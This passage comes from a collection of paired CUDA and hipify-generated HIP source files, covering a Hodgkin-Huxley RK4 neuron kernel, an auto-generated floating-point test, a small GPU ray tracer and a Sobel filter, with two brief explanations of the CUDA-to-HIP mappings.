compute_dV(V+0.5*k1_V, n+0.5*k1_n, m+0.5*k1_m, h+0.5*k1_h, I, C_m[cart_id], V_Na[cart_id], V_K[cart_id], V_l[cart_id], g_Na[cart_id], g_K[cart_id], g_l[cart_id]); k2_n = dt * compute_dn(V+0.5*k1_V, n+0.5*k1_n); k2_m = dt * compute_dm(V+0.5*k1_V, m+0.5*k1_m); k2_h = dt * compute_dh(V+0.5*k1_V, h+0.5*k1_h); k3_V = dt * compute_dV(V+0.5*k2_V, n+0.5*k2_n, m+0.5*k2_m, h+0.5*k2_h, I, C_m[cart_id], V_Na[cart_id], V_K[cart_id], V_l[cart_id], g_Na[cart_id], g_K[cart_id], g_l[cart_id]); k3_n = dt * compute_dn(V+0.5*k2_V, n+0.5*k2_n); k3_m = dt * compute_dm(V+0.5*k2_V, m+0.5*k2_m); k3_h = dt * compute_dh(V+0.5*k2_V, h+0.5*k2_h); k4_V = dt * compute_dV(V+k3_V, n+k3_n, m+k3_m, h+k3_h, I, C_m[cart_id], V_Na[cart_id], V_K[cart_id], V_l[cart_id], g_Na[cart_id], g_K[cart_id], g_l[cart_id]); k4_n = dt * compute_dn(V+k3_V, n+k3_n); k4_m = dt * compute_dm(V+k3_V, m+k3_m); k4_h = dt * compute_dh(V+k3_V, h+k3_h); // compute new quantities V += (k1_V + 2*(k2_V + k3_V) + k4_V)/6.0; n += (k1_n + 2*(k2_n + k3_n) + k4_n)/6.0; m += (k1_m + 2*(k2_m + k3_m) + k4_m)/6.0; h += (k1_h + 2*(k2_h + k3_h) + k4_h)/6.0; g_V[cart_id] = V; g_n[cart_id] = n; g_m[cart_id] = m; g_h[cart_id] = h; } }
b43225e91aa4b76e134719df9a49b8079dc59f34.cu
#define NVAR 2 #define NNEU %(nneu)d //NROW * NCOL // device compute submethods __device__ %(type)s compute_dV(%(type)s V, %(type)s n, %(type)s m, %(type)s h, %(type)s I, %(type)s C_m, %(type)s V_Na, %(type)s V_K, %(type)s V_l, %(type)s g_Na, %(type)s g_K, %(type)s g_l) { return (-1/C_m) * (g_K*n*n*n*n*(V-V_K) + g_Na*m*m*m*h*(V-V_Na) + g_l*(V-V_l)-I); } __device__ %(type)s compute_dn(%(type)s V, %(type)s n) { // LVS TODO: This seems hacky %(type)s alpha_n; if(V == -55.0) alpha_n = 0.1; else alpha_n = (-0.01*(55.0+V)) / (exp(-(55.0+V)/10.0)-1); %(type)s beta_n = 0.125 * exp(-(V+65)/80.0); return (alpha_n * (1-n) - beta_n * n); } __device__ %(type)s compute_dm(%(type)s V, %(type)s m) { %(type)s alpha_m; if(V == -40.0) alpha_m = 1.0; else alpha_m = (-0.1*(40+V)) / (exp(-(40+V)/10.0) - 1); %(type)s beta_m = 4 * exp(-(V+65)/18.0); return (alpha_m * (1-m) - beta_m * m); } __device__ %(type)s compute_dh(%(type)s V, %(type)s h) { %(type)s alpha_h = 0.07 * exp(-(V+65)/20.0); %(type)s beta_h = 1 / (exp(-(35+V)/10.0) + 1); return (alpha_h * (1-h) - beta_h * h); } // main kernel __global__ void hodgkin_huxley_rk4(%(type)s* g_V, %(type)s* g_n, %(type)s* g_m, %(type)s* g_h, int num_neurons, %(type)s* I_pre, %(type)s dt, %(type)s* C_m, %(type)s* V_Na, %(type)s* V_K, %(type)s* V_l, %(type)s* g_Na, %(type)s* g_K, %(type)s* g_l) { int bid = blockIdx.x; int cart_id = bid * NNEU + threadIdx.x; %(type)s I, V, n, m, h; if(cart_id < num_neurons) { I = I_pre[cart_id]; V = g_V[cart_id]; n = g_n[cart_id]; m = g_m[cart_id]; h = g_h[cart_id]; %(type)s k1_V, k2_V, k3_V, k4_V; %(type)s k1_n, k2_n, k3_n, k4_n; %(type)s k1_m, k2_m, k3_m, k4_m; %(type)s k1_h, k2_h, k3_h, k4_h; // RK4 using device derivative calculation functions k1_V = dt * compute_dV(V, n, m, h, I, C_m[cart_id], V_Na[cart_id], V_K[cart_id], V_l[cart_id], g_Na[cart_id], g_K[cart_id], g_l[cart_id]); k1_n = dt * compute_dn(V, n); k1_m = dt * compute_dm(V, m); k1_h = dt * compute_dh(V, h); k2_V = dt * compute_dV(V+0.5*k1_V, n+0.5*k1_n, m+0.5*k1_m, h+0.5*k1_h, I, C_m[cart_id], V_Na[cart_id], V_K[cart_id], V_l[cart_id], g_Na[cart_id], g_K[cart_id], g_l[cart_id]); k2_n = dt * compute_dn(V+0.5*k1_V, n+0.5*k1_n); k2_m = dt * compute_dm(V+0.5*k1_V, m+0.5*k1_m); k2_h = dt * compute_dh(V+0.5*k1_V, h+0.5*k1_h); k3_V = dt * compute_dV(V+0.5*k2_V, n+0.5*k2_n, m+0.5*k2_m, h+0.5*k2_h, I, C_m[cart_id], V_Na[cart_id], V_K[cart_id], V_l[cart_id], g_Na[cart_id], g_K[cart_id], g_l[cart_id]); k3_n = dt * compute_dn(V+0.5*k2_V, n+0.5*k2_n); k3_m = dt * compute_dm(V+0.5*k2_V, m+0.5*k2_m); k3_h = dt * compute_dh(V+0.5*k2_V, h+0.5*k2_h); k4_V = dt * compute_dV(V+k3_V, n+k3_n, m+k3_m, h+k3_h, I, C_m[cart_id], V_Na[cart_id], V_K[cart_id], V_l[cart_id], g_Na[cart_id], g_K[cart_id], g_l[cart_id]); k4_n = dt * compute_dn(V+k3_V, n+k3_n); k4_m = dt * compute_dm(V+k3_V, m+k3_m); k4_h = dt * compute_dh(V+k3_V, h+k3_h); // compute new quantities V += (k1_V + 2*(k2_V + k3_V) + k4_V)/6.0; n += (k1_n + 2*(k2_n + k3_n) + k4_n)/6.0; m += (k1_m + 2*(k2_m + k3_m) + k4_m)/6.0; h += (k1_h + 2*(k2_h + k3_h) + k4_h)/6.0; g_V[cart_id] = V; g_n[cart_id] = n; g_m[cart_id] = m; g_h[cart_id] = h; } }
4f2a758e8b32010551e805b61b1ba324e8fb1e29.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /* This is a automatically generated test. Do not modify */ #include <stdio.h> #include <stdlib.h> #include <math.h> __global__ void compute(float comp, float var_1,float var_2,float var_3,float var_4,float var_5,float var_6,float var_7,float var_8,float var_9,float var_10,float var_11,float var_12,float var_13,float var_14,float var_15,float var_16,float var_17,float var_18,float var_19,float var_20,float var_21,float var_22,float var_23,float var_24,float var_25,float var_26,float var_27,float var_28) { float tmp_1 = var_1 * -0.0f - var_2 / +0.0f; float tmp_2 = (var_3 * (var_4 * var_5)); comp += tmp_2 - tmp_1 / +1.0103E-44f * var_6 * var_7 - (+0.0f * sinf(+1.5151E-44f - sqrtf((-0.0f + (var_8 / (var_9 + +0.0f)))))); if (comp <= log10f(atan2f(var_10 / -1.9340E-44f, +1.4925E-18f))) { float tmp_3 = +0.0f; comp = tmp_3 * var_11 - (var_12 * -1.8594E-36f); } if (comp == -1.3120E34f + (var_13 / fabsf((var_14 / expf((-1.0795E18f / (+0.0f + atan2f((-0.0f - (var_15 - -1.9336E-37f)), +1.9858E-35f - powf(log10f(-1.5112E-36f), (+1.7540E12f - (-1.6749E25f / +1.1231E-43f / (var_16 - var_17 * var_18)))))))))))) { float tmp_4 = (var_19 - (+1.6602E35f + var_20)); comp += tmp_4 - var_21 / var_22 / +1.1368E35f; comp += (var_23 / sqrtf((-1.5675E-37f + +1.5945E17f))); } if (comp == atanf((-1.5185E-43f - var_24))) { comp += var_25 * (+1.8088E-37f / -1.7803E35f - (var_26 / (-1.5110E22f - -1.7122E7f))); float tmp_5 = (-1.2107E-13f + (var_27 / +1.2324E-35f)); comp = tmp_5 - (var_28 / expf(asinf(-0.0f))); } printf("%.17g\n", comp); } float* initPointer(float v) { float *ret = (float*) malloc(sizeof(float)*10); for(int i=0; i < 10; ++i) ret[i] = v; return ret; } int main(int argc, char** argv) { /* Program variables */ float tmp_1 = atof(argv[1]); float tmp_2 = atof(argv[2]); float tmp_3 = atof(argv[3]); float tmp_4 = atof(argv[4]); float tmp_5 = atof(argv[5]); float tmp_6 = atof(argv[6]); float tmp_7 = atof(argv[7]); float tmp_8 = atof(argv[8]); float tmp_9 = atof(argv[9]); float tmp_10 = atof(argv[10]); float tmp_11 = atof(argv[11]); float tmp_12 = atof(argv[12]); float tmp_13 = atof(argv[13]); float tmp_14 = atof(argv[14]); float tmp_15 = atof(argv[15]); float tmp_16 = atof(argv[16]); float tmp_17 = atof(argv[17]); float tmp_18 = atof(argv[18]); float tmp_19 = atof(argv[19]); float tmp_20 = atof(argv[20]); float tmp_21 = atof(argv[21]); float tmp_22 = atof(argv[22]); float tmp_23 = atof(argv[23]); float tmp_24 = atof(argv[24]); float tmp_25 = atof(argv[25]); float tmp_26 = atof(argv[26]); float tmp_27 = atof(argv[27]); float tmp_28 = atof(argv[28]); float tmp_29 = atof(argv[29]); hipLaunchKernelGGL(( compute), dim3(1),dim3(1), 0, 0, tmp_1,tmp_2,tmp_3,tmp_4,tmp_5,tmp_6,tmp_7,tmp_8,tmp_9,tmp_10,tmp_11,tmp_12,tmp_13,tmp_14,tmp_15,tmp_16,tmp_17,tmp_18,tmp_19,tmp_20,tmp_21,tmp_22,tmp_23,tmp_24,tmp_25,tmp_26,tmp_27,tmp_28,tmp_29); hipDeviceSynchronize(); return 0; }
4f2a758e8b32010551e805b61b1ba324e8fb1e29.cu
/* This is a automatically generated test. Do not modify */ #include <stdio.h> #include <stdlib.h> #include <math.h> __global__ void compute(float comp, float var_1,float var_2,float var_3,float var_4,float var_5,float var_6,float var_7,float var_8,float var_9,float var_10,float var_11,float var_12,float var_13,float var_14,float var_15,float var_16,float var_17,float var_18,float var_19,float var_20,float var_21,float var_22,float var_23,float var_24,float var_25,float var_26,float var_27,float var_28) { float tmp_1 = var_1 * -0.0f - var_2 / +0.0f; float tmp_2 = (var_3 * (var_4 * var_5)); comp += tmp_2 - tmp_1 / +1.0103E-44f * var_6 * var_7 - (+0.0f * sinf(+1.5151E-44f - sqrtf((-0.0f + (var_8 / (var_9 + +0.0f)))))); if (comp <= log10f(atan2f(var_10 / -1.9340E-44f, +1.4925E-18f))) { float tmp_3 = +0.0f; comp = tmp_3 * var_11 - (var_12 * -1.8594E-36f); } if (comp == -1.3120E34f + (var_13 / fabsf((var_14 / expf((-1.0795E18f / (+0.0f + atan2f((-0.0f - (var_15 - -1.9336E-37f)), +1.9858E-35f - powf(log10f(-1.5112E-36f), (+1.7540E12f - (-1.6749E25f / +1.1231E-43f / (var_16 - var_17 * var_18)))))))))))) { float tmp_4 = (var_19 - (+1.6602E35f + var_20)); comp += tmp_4 - var_21 / var_22 / +1.1368E35f; comp += (var_23 / sqrtf((-1.5675E-37f + +1.5945E17f))); } if (comp == atanf((-1.5185E-43f - var_24))) { comp += var_25 * (+1.8088E-37f / -1.7803E35f - (var_26 / (-1.5110E22f - -1.7122E7f))); float tmp_5 = (-1.2107E-13f + (var_27 / +1.2324E-35f)); comp = tmp_5 - (var_28 / expf(asinf(-0.0f))); } printf("%.17g\n", comp); } float* initPointer(float v) { float *ret = (float*) malloc(sizeof(float)*10); for(int i=0; i < 10; ++i) ret[i] = v; return ret; } int main(int argc, char** argv) { /* Program variables */ float tmp_1 = atof(argv[1]); float tmp_2 = atof(argv[2]); float tmp_3 = atof(argv[3]); float tmp_4 = atof(argv[4]); float tmp_5 = atof(argv[5]); float tmp_6 = atof(argv[6]); float tmp_7 = atof(argv[7]); float tmp_8 = atof(argv[8]); float tmp_9 = atof(argv[9]); float tmp_10 = atof(argv[10]); float tmp_11 = atof(argv[11]); float tmp_12 = atof(argv[12]); float tmp_13 = atof(argv[13]); float tmp_14 = atof(argv[14]); float tmp_15 = atof(argv[15]); float tmp_16 = atof(argv[16]); float tmp_17 = atof(argv[17]); float tmp_18 = atof(argv[18]); float tmp_19 = atof(argv[19]); float tmp_20 = atof(argv[20]); float tmp_21 = atof(argv[21]); float tmp_22 = atof(argv[22]); float tmp_23 = atof(argv[23]); float tmp_24 = atof(argv[24]); float tmp_25 = atof(argv[25]); float tmp_26 = atof(argv[26]); float tmp_27 = atof(argv[27]); float tmp_28 = atof(argv[28]); float tmp_29 = atof(argv[29]); compute<<<1,1>>>(tmp_1,tmp_2,tmp_3,tmp_4,tmp_5,tmp_6,tmp_7,tmp_8,tmp_9,tmp_10,tmp_11,tmp_12,tmp_13,tmp_14,tmp_15,tmp_16,tmp_17,tmp_18,tmp_19,tmp_20,tmp_21,tmp_22,tmp_23,tmp_24,tmp_25,tmp_26,tmp_27,tmp_28,tmp_29); cudaDeviceSynchronize(); return 0; }
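Diffing this pair shows the two host-side rewrites hipify applies to the generated test: the triple-chevron launch compute<<<1,1>>>(...) becomes hipLaunchKernelGGL(( compute), dim3(1), dim3(1), 0, 0, ...), with the dynamic shared-memory size and stream made explicit, and cudaDeviceSynchronize() becomes hipDeviceSynchronize(). A minimal sketch of the same mapping, assuming a hypothetical scale kernel that is not part of the files above:

#include "hip/hip_runtime.h"

__global__ void scale(float* buf, float a, int n) {                // hypothetical kernel
    int i = blockIdx.x * blockDim.x + threadIdx.x;
    if (i < n) buf[i] *= a;
}

void launch_scale(float* d_buf, float a, int n) {
    dim3 grid((n + 255) / 256), block(256);
    // CUDA original:  scale<<<grid, block>>>(d_buf, a, n);
    // hipify output:  the launch configuration becomes explicit arguments
    //                 (grid, block, dynamic shared bytes, stream), then the kernel arguments.
    hipLaunchKernelGGL((scale), grid, block, 0, 0, d_buf, a, n);
    hipDeviceSynchronize();                                        // was cudaDeviceSynchronize()
}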
ade2c1fc492522a20a72d7887bacba9067dda00d.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <fstream> #include "mkRay.h" #include <time.h> #include "mkSphere.h" #include "mkHitablelist.h" #include <float.h> #include <hiprand/hiprand_kernel.h> #include "mkCamera.h" using namespace std; //MK: FB int nx = 1200; int ny = 600; int ns = 100; // limited version of checkCudaErrors from helper_cuda.h in CUDA examples //MK: #val val String Return ( 3) #define checkCudaErrors(val) check_cuda( (val), #val, __FILE__, __LINE__ ) //MK: Error void check_cuda(hipError_t result, char const *const func, const char *const file, int const line) { if (result) { cerr << "MK: CUDA ERROR = " << static_cast<unsigned int>(result) << " at " << file << ":" << line << " '" << func << "' \n"; // Make sure we call CUDA Device Reset before exiting hipDeviceReset(); exit(99); } } __global__ void mkCreateWorld(hitable **dList, hitable **dWorld, camera **dCamera){ if(threadIdx.x == 0 && blockIdx.x == 0){ *(dList) = new sphere(vec3(0, 0, -1), 0.5); *(dList + 1) = new sphere(vec3(0, -100.5, -1), 100); *dWorld = new hitableList(dList, 2); *dCamera = new camera(); } } //MK: ( 1-2) Random Vector #define RANDVEC3 vec3(hiprand_uniform(localRandState), hiprand_uniform(localRandState), hiprand_uniform(localRandState)) //MK: ( 1-3) Unit Sphere Random __device__ vec3 randomInUnitSphere(hiprandState_t *localRandState){ vec3 p; do{ p = 2.0f * RANDVEC3 - vec3(1.0, 1.0, 1.0); } while (p.squared_length() >= 1.0f); return p; } //MK: ( 1-1) Recurisve Loop __device__ vec3 color(const ray &r, hitable **dWorld, hiprandState_t *localRandState){ ray curRay = r; float curAttenuation = 1.0f; for(int i = 0; i < 50; i++){ hitRecord rec; if((*dWorld)->hit(curRay, 0.001f, FLT_MAX, rec)){ vec3 target = rec.p + rec.normal + randomInUnitSphere(localRandState); curAttenuation *= 0.5f; curRay = ray(rec.p, target-rec.p); } else{ vec3 unitDirection = unitVector(curRay.direction()); float t = 0.5f * (unitDirection.y() + 1.0f); vec3 c = (1.0f - t) * vec3(1.0, 1.0, 1.0) + t * vec3(0.5, 0.7, 1.0); return curAttenuation * c; } } return vec3(0.0, 0.0, 0.0); } __global__ void mkRender(vec3 *fb, int max_x, int max_y, int num_sample, camera **cam, hitable **dWorld) { //MK: Pixel ThreadId, BlockId int i = threadIdx.x + blockIdx.x * blockDim.x; int j = threadIdx.y + blockIdx.y * blockDim.y; //MK: Pixel FB if((i >= max_x) || (j >= max_y)){ return; } //MK: FB Pixel int pixel_index = j*max_x + i; hiprandState_t rand_state; //hiprand_init(1984, pixel_index, 0, &rand_state); hiprand_init(pixel_index, 0, 0, &rand_state); vec3 col(0, 0, 0); for(int s = 0; s < num_sample; s++){ float u = float(i + hiprand_uniform(&rand_state))/float(max_x); float v = float(j + hiprand_uniform(&rand_state))/float(max_y); ray r = (*cam)->get_ray(u, v); col += color(r, dWorld, &rand_state); } fb[pixel_index] = col/float(num_sample); } __global__ void mkFreeWorld(hitable **dList, hitable **dWorld, camera **dCamera){ if(threadIdx.x == 0 && blockIdx.x == 0){ delete *(dList); delete *(dList + 1); delete *dWorld; delete *dCamera; } } int main() { //MK: Thread Block int tx = 8; int ty = 8; cout << "MK: Rendering a " << nx << "x" << ny << " Image "; cout << "MK: in " << tx << "x" << ty << " Thread Blocks.\n"; clock_t start, stop; start = clock(); int num_pixels = nx*ny; size_t fb_size = 3*num_pixels*sizeof(float); //MK: FB (hipMallocManaged Unitifed Memory ) //MK: CPU/GPU GPU/CPU vec3 *fb; checkCudaErrors(hipMallocManaged((void **)&fb, fb_size)); hitable **dList; hitable **dWorld; camera **dCamera; 
checkCudaErrors(hipMalloc((void **) &dList, 2 * sizeof(hitable *))); checkCudaErrors(hipMalloc((void **) &dWorld, sizeof(hitable *))); checkCudaErrors(hipMalloc((void **) &dCamera, sizeof(camera *))); hipLaunchKernelGGL(( mkCreateWorld), dim3(1), dim3(1), 0, 0, dList, dWorld, dCamera); checkCudaErrors(hipGetLastError()); checkCudaErrors(hipDeviceSynchronize()); //MK: GPU (CUDA) Thread Block, Grid dim3 blocks(nx/tx+1,ny/ty+1); dim3 threads(tx,ty); //MK: CUDA hipLaunchKernelGGL(( mkRender), dim3(blocks), dim3(threads), 0, 0, fb, nx, ny, ns, dCamera, dWorld); checkCudaErrors(hipGetLastError()); //MK: CUDA checkCudaErrors(hipDeviceSynchronize()); //MK: //MK: CPU string fileName = "Ch7_gpu.ppm"; ofstream writeFile(fileName.data()); if(writeFile.is_open()){ writeFile.flush(); writeFile << "P3\n" << nx << " " << ny << "\n255\n"; for (int j = ny-1; j >= 0; j--) { for (int i = 0; i < nx; i++) { size_t pixel_index = j*nx + i; int ir = int(255.99 * fb[pixel_index].r()); int ig = int(255.99 * fb[pixel_index].g()); int ib = int(255.99 * fb[pixel_index].b()); writeFile << ir << " " << ig << " " << ib << "\n"; } } writeFile.close(); } hipLaunchKernelGGL(( mkFreeWorld), dim3(1), dim3(1), 0, 0, dList, dWorld, dCamera); checkCudaErrors(hipGetLastError()); checkCudaErrors(hipFree(dList)); checkCudaErrors(hipFree(dWorld)); checkCudaErrors(hipFree(fb)); checkCudaErrors(hipFree(dCamera)); //MK: stop = clock(); double timer_seconds = ((double)(stop - start)) / CLOCKS_PER_SEC; cout << "MK: GPU (CUDA) Took " << timer_seconds << " Seconds.\n"; return 0; }
ade2c1fc492522a20a72d7887bacba9067dda00d.cu
#include <fstream> #include "mkRay.h" #include <time.h> #include "mkSphere.h" #include "mkHitablelist.h" #include <float.h> #include <curand_kernel.h> #include "mkCamera.h" using namespace std; //MK: FB 사이즈 int nx = 1200; int ny = 600; int ns = 100; // limited version of checkCudaErrors from helper_cuda.h in CUDA examples //MK: #val은 val 전체를 String으로 Return 함 (출처 3) #define checkCudaErrors(val) check_cuda( (val), #val, __FILE__, __LINE__ ) //MK: Error 위치를 파악하기 위해서 사용 void check_cuda(cudaError_t result, char const *const func, const char *const file, int const line) { if (result) { cerr << "MK: CUDA ERROR = " << static_cast<unsigned int>(result) << " at " << file << ":" << line << " '" << func << "' \n"; // Make sure we call CUDA Device Reset before exiting cudaDeviceReset(); exit(99); } } __global__ void mkCreateWorld(hitable **dList, hitable **dWorld, camera **dCamera){ if(threadIdx.x == 0 && blockIdx.x == 0){ *(dList) = new sphere(vec3(0, 0, -1), 0.5); *(dList + 1) = new sphere(vec3(0, -100.5, -1), 100); *dWorld = new hitableList(dList, 2); *dCamera = new camera(); } } //MK: (코드 1-2) Random 하게 Vector을 생성하기 위한 코드 #define RANDVEC3 vec3(curand_uniform(localRandState), curand_uniform(localRandState), curand_uniform(localRandState)) //MK: (코드 1-3) Unit Sphere의 Random한 포인터를 생성하기 위한 코드 __device__ vec3 randomInUnitSphere(curandState *localRandState){ vec3 p; do{ p = 2.0f * RANDVEC3 - vec3(1.0, 1.0, 1.0); } while (p.squared_length() >= 1.0f); return p; } //MK: (코드 1-1) Recurisve 함수를 Loop을 사용하도록 변경함 __device__ vec3 color(const ray &r, hitable **dWorld, curandState *localRandState){ ray curRay = r; float curAttenuation = 1.0f; for(int i = 0; i < 50; i++){ hitRecord rec; if((*dWorld)->hit(curRay, 0.001f, FLT_MAX, rec)){ vec3 target = rec.p + rec.normal + randomInUnitSphere(localRandState); curAttenuation *= 0.5f; curRay = ray(rec.p, target-rec.p); } else{ vec3 unitDirection = unitVector(curRay.direction()); float t = 0.5f * (unitDirection.y() + 1.0f); vec3 c = (1.0f - t) * vec3(1.0, 1.0, 1.0) + t * vec3(0.5, 0.7, 1.0); return curAttenuation * c; } } return vec3(0.0, 0.0, 0.0); } __global__ void mkRender(vec3 *fb, int max_x, int max_y, int num_sample, camera **cam, hitable **dWorld) { //MK: Pixel 위치 계산을 위해 ThreadId, BlockId를 사용함 int i = threadIdx.x + blockIdx.x * blockDim.x; int j = threadIdx.y + blockIdx.y * blockDim.y; //MK: 계산된 Pixel 위치가 FB사이즈 보다 크면 연산을 수행하지 않음 if((i >= max_x) || (j >= max_y)){ return; } //MK: FB Pixel 값 계산 int pixel_index = j*max_x + i; curandState rand_state; //curand_init(1984, pixel_index, 0, &rand_state); curand_init(pixel_index, 0, 0, &rand_state); vec3 col(0, 0, 0); for(int s = 0; s < num_sample; s++){ float u = float(i + curand_uniform(&rand_state))/float(max_x); float v = float(j + curand_uniform(&rand_state))/float(max_y); ray r = (*cam)->get_ray(u, v); col += color(r, dWorld, &rand_state); } fb[pixel_index] = col/float(num_sample); } __global__ void mkFreeWorld(hitable **dList, hitable **dWorld, camera **dCamera){ if(threadIdx.x == 0 && blockIdx.x == 0){ delete *(dList); delete *(dList + 1); delete *dWorld; delete *dCamera; } } int main() { //MK: Thread Block 사이즈 int tx = 8; int ty = 8; cout << "MK: Rendering a " << nx << "x" << ny << " Image "; cout << "MK: in " << tx << "x" << ty << " Thread Blocks.\n"; clock_t start, stop; start = clock(); int num_pixels = nx*ny; size_t fb_size = 3*num_pixels*sizeof(float); //MK: FB 메모리 할당 (cudaMallocManaged 는 Unitifed Memory를 사용 할 수 있도록 함) //MK: 필요에 따라 CPU/GPU에서 GPU/CPU로 데이터를 복사함 vec3 *fb; checkCudaErrors(cudaMallocManaged((void 
**)&fb, fb_size)); hitable **dList; hitable **dWorld; camera **dCamera; checkCudaErrors(cudaMalloc((void **) &dList, 2 * sizeof(hitable *))); checkCudaErrors(cudaMalloc((void **) &dWorld, sizeof(hitable *))); checkCudaErrors(cudaMalloc((void **) &dCamera, sizeof(camera *))); mkCreateWorld<<<1, 1>>>(dList, dWorld, dCamera); checkCudaErrors(cudaGetLastError()); checkCudaErrors(cudaDeviceSynchronize()); //MK: GPU (CUDA) 연산을 위해서 Thread Block, Grid 사이즈 결정 dim3 blocks(nx/tx+1,ny/ty+1); dim3 threads(tx,ty); //MK: CUDA 함수 호출 mkRender<<<blocks, threads>>>(fb, nx, ny, ns, dCamera, dWorld); checkCudaErrors(cudaGetLastError()); //MK: CUDA 연산이 완료되길 기다림 checkCudaErrors(cudaDeviceSynchronize()); //MK: 연산 시간과 끝 부분을 계산하여서 연산 시간을 측정함 //MK: CPU 코드와 동일하게 결과를 파일에 작성 string fileName = "Ch7_gpu.ppm"; ofstream writeFile(fileName.data()); if(writeFile.is_open()){ writeFile.flush(); writeFile << "P3\n" << nx << " " << ny << "\n255\n"; for (int j = ny-1; j >= 0; j--) { for (int i = 0; i < nx; i++) { size_t pixel_index = j*nx + i; int ir = int(255.99 * fb[pixel_index].r()); int ig = int(255.99 * fb[pixel_index].g()); int ib = int(255.99 * fb[pixel_index].b()); writeFile << ir << " " << ig << " " << ib << "\n"; } } writeFile.close(); } mkFreeWorld<<<1, 1>>>(dList, dWorld, dCamera); checkCudaErrors(cudaGetLastError()); checkCudaErrors(cudaFree(dList)); checkCudaErrors(cudaFree(dWorld)); checkCudaErrors(cudaFree(fb)); checkCudaErrors(cudaFree(dCamera)); //MK: 연산 시간과 끝 부분을 계산하여서 연산 시간을 측정함 stop = clock(); double timer_seconds = ((double)(stop - start)) / CLOCKS_PER_SEC; cout << "MK: GPU (CUDA) Took " << timer_seconds << " Seconds.\n"; return 0; }
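In this ray-tracer pair the conversion is mostly a library rename: <curand_kernel.h> becomes <hiprand/hiprand_kernel.h>, curandState becomes hiprandState_t, curand_init/curand_uniform become hiprand_init/hiprand_uniform, the runtime calls (cudaMallocManaged, cudaGetLastError, cudaDeviceSynchronize, cudaFree, cudaDeviceReset) take the hip prefix, and the kernel launches are rewritten as hipLaunchKernelGGL. Note also that the Korean comment text of the CUDA original (for example "//MK: FB 사이즈", "FB size") was stripped from the hipified copy, leaving truncated comments such as "//MK: FB". A minimal sketch of the per-thread RNG mapping, with a hypothetical fill_uniform kernel not taken from the files above:

#include "hip/hip_runtime.h"
#include <hiprand/hiprand_kernel.h>      // hipify's replacement for <curand_kernel.h>

// curandState -> hiprandState_t, curand_init -> hiprand_init, curand_uniform -> hiprand_uniform
__global__ void fill_uniform(float* out, int n, unsigned long long seed) {
    int i = blockIdx.x * blockDim.x + threadIdx.x;
    if (i >= n) return;
    hiprandState_t rs;
    hiprand_init(seed, i, 0, &rs);       // seed, subsequence, offset, state
    out[i] = hiprand_uniform(&rs);       // uniform float in (0, 1], as with curand_uniform
}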
aadfd4f42881846a4093275568200708515006f9.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "device_launch_parameters.h" #include <stdio.h> #include "hip/hip_runtime.h" #include <opencv2/highgui/highgui.hpp> #include <opencv2/imgproc/imgproc.hpp> #include <opencv2/core/core.hpp> #include <opencv2/video/tracking.hpp> int divCeil(int a, int b) { if ((a % b) != 0) return a / b + 1; return a / b; } __global__ void kernel(unsigned char* imgIn, unsigned char* imgOut, int width, int height) { int col = blockIdx.x * blockDim.x + threadIdx.x; int line = blockIdx.y * blockDim.y + threadIdx.y; int Index = (line * width) + (col); if ((col < width - 2) && (line < height - 2)) { int i = Index; int Gx = imgIn[i] * 1 + imgIn[i + 1] * 0 + imgIn[i + 2] * -1; i = ((line + 1) * width) + (col); Gx += imgIn[i] * 2 + imgIn[i + 1] * 0 + imgIn[i + 2] * -2; i = ((line + 2) * width) + (col); Gx += imgIn[i] * 1 + imgIn[i + 1] * 0 + imgIn[i + 2] * -1; i = Index; int Gy = imgIn[i] * 1 + imgIn[i + 1] * 2 + imgIn[i + 2] * 1; i = ((line + 1) * width) + (col); Gy += imgIn[i] * 0 + imgIn[i + 1] * 0 + imgIn[i + 2] * 0; i = ((line + 2) * width) + (col); Gy += imgIn[i] * -1 + imgIn[i + 1] * -2 + imgIn[i + 2] * -1; imgOut[Index] = sqrtf(Gx * Gx + Gy * Gy) * 0.25; } return; } extern "C" bool apply_Sobel(cv::Mat * inputImage, cv::Mat * outputImage) { hipError_t cudaStatus; unsigned char* deviceIn; unsigned char* deviceOut; int BLOCK_SIZE = 32; unsigned int imageSize = inputImage->rows * inputImage->cols * sizeof(unsigned char); unsigned int gradientSize = inputImage->rows * inputImage->cols * sizeof(unsigned char); dim3 dimBlock(BLOCK_SIZE, BLOCK_SIZE); dim3 dimGrid(divCeil(inputImage->cols, BLOCK_SIZE), divCeil(inputImage->rows, BLOCK_SIZE)); cudaStatus = hipMalloc(&deviceIn, imageSize); cudaStatus = hipMalloc(&deviceOut, gradientSize); cudaStatus = hipMemcpy(deviceIn, inputImage->data, imageSize, hipMemcpyHostToDevice); kernel << <dimGrid, dimBlock >> > (deviceIn, deviceOut, inputImage->step1(), inputImage->rows); cudaStatus = hipGetLastError(); if (cudaStatus != hipSuccess) { fprintf(stderr, "addKernel launch failed: %s\n", hipGetErrorString(cudaStatus)); hipFree(deviceIn); hipFree(deviceOut); return cudaStatus; } cudaStatus = hipDeviceSynchronize(); if (cudaStatus != hipSuccess) { fprintf(stderr, "hipDeviceSynchronize failed!"); hipFree(deviceIn); hipFree(deviceOut); return cudaStatus; } cudaStatus = hipMemcpy(outputImage->data, deviceOut, gradientSize, hipMemcpyDeviceToHost); hipFree(deviceIn); hipFree(deviceOut); return cudaStatus; }
aadfd4f42881846a4093275568200708515006f9.cu
#include "cuda_runtime.h" #include "device_launch_parameters.h" #include <stdio.h> #include "cuda_runtime.h" #include <opencv2/highgui/highgui.hpp> #include <opencv2/imgproc/imgproc.hpp> #include <opencv2/core/core.hpp> #include <opencv2/video/tracking.hpp> int divCeil(int a, int b) { if ((a % b) != 0) return a / b + 1; return a / b; } __global__ void kernel(unsigned char* imgIn, unsigned char* imgOut, int width, int height) { int col = blockIdx.x * blockDim.x + threadIdx.x; int line = blockIdx.y * blockDim.y + threadIdx.y; int Index = (line * width) + (col); if ((col < width - 2) && (line < height - 2)) { int i = Index; int Gx = imgIn[i] * 1 + imgIn[i + 1] * 0 + imgIn[i + 2] * -1; i = ((line + 1) * width) + (col); Gx += imgIn[i] * 2 + imgIn[i + 1] * 0 + imgIn[i + 2] * -2; i = ((line + 2) * width) + (col); Gx += imgIn[i] * 1 + imgIn[i + 1] * 0 + imgIn[i + 2] * -1; i = Index; int Gy = imgIn[i] * 1 + imgIn[i + 1] * 2 + imgIn[i + 2] * 1; i = ((line + 1) * width) + (col); Gy += imgIn[i] * 0 + imgIn[i + 1] * 0 + imgIn[i + 2] * 0; i = ((line + 2) * width) + (col); Gy += imgIn[i] * -1 + imgIn[i + 1] * -2 + 